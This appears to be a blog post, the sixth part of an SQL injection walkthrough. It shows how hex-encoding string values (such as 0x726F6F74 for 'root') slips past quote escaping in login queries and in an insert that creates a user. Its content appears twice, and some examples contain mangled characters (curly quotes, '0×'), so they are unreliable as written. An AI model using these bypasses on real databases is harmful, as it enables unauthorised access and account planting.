SQL Injection Walkthrough part VI (Advanced Vectors part two/end)
Using an HEX encoded query to bypass escaping.
Normal:
SELECT * FROM login WHERE user = 'root'
Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
Inserting a new user in SQL.
Normal:
insert into login set user = ‘root’, pass = ‘root’
Bypass:
insert into login set user = 0×726F6F74, pass = 0×726F6F74
How to determin the HEX value for injection.
SELECT HEX('root');
gives you:
726F6F74
then add:
0x
before it.
Normal:
SELECT * FROM login WHERE user = 'root'
Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
Inserting a new user in SQL.
Normal:
insert into login set user = ‘root’, pass = ‘root’
Bypass:
insert into login set user = 0×726F6F74, pass = 0×726F6F74
How to determin the HEX value for injection.
SELECT HEX('root');
gives you:
726F6F74
then add:
0x
before it.
posted by Sigit at
11:22 AM
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home